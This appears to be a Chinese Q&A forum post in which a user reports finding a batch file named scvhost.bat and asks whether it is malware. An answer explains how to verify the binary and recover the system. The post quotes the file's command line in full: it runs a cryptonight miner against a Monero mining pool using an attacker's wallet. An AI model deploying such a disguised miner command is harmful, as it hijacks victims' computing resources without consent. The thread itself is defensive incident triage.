我刚刚找到了一个名为 scvhost.bat 的 .bat 文件。该文件包含以下内容:
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
这是一个病毒(用于窃取信息等)还是一个植入的矿工?我很担心,因为我也涉足加密货币,而且它stratum是上述文件中提到的一种货币。
答案1
这似乎确实是一种矿工,特别是因为该参数包含一个采矿池的 URL。但是,您需要确定二进制文件中的内容。将您在系统中找到的二进制文件的校验和与矿工开发团队发布的版本进行比较是有意义的。如果它们不同;则认为您的系统不安全。
另一个问题是,您发现了这个挖矿程序(可能是因为它占用了大量 CPU),但您不知道系统上还发生了什么。如果入侵者可以启动挖矿程序,他们也可以启动其他程序。无论如何,从备份中恢复或重新安装可能是个好主意。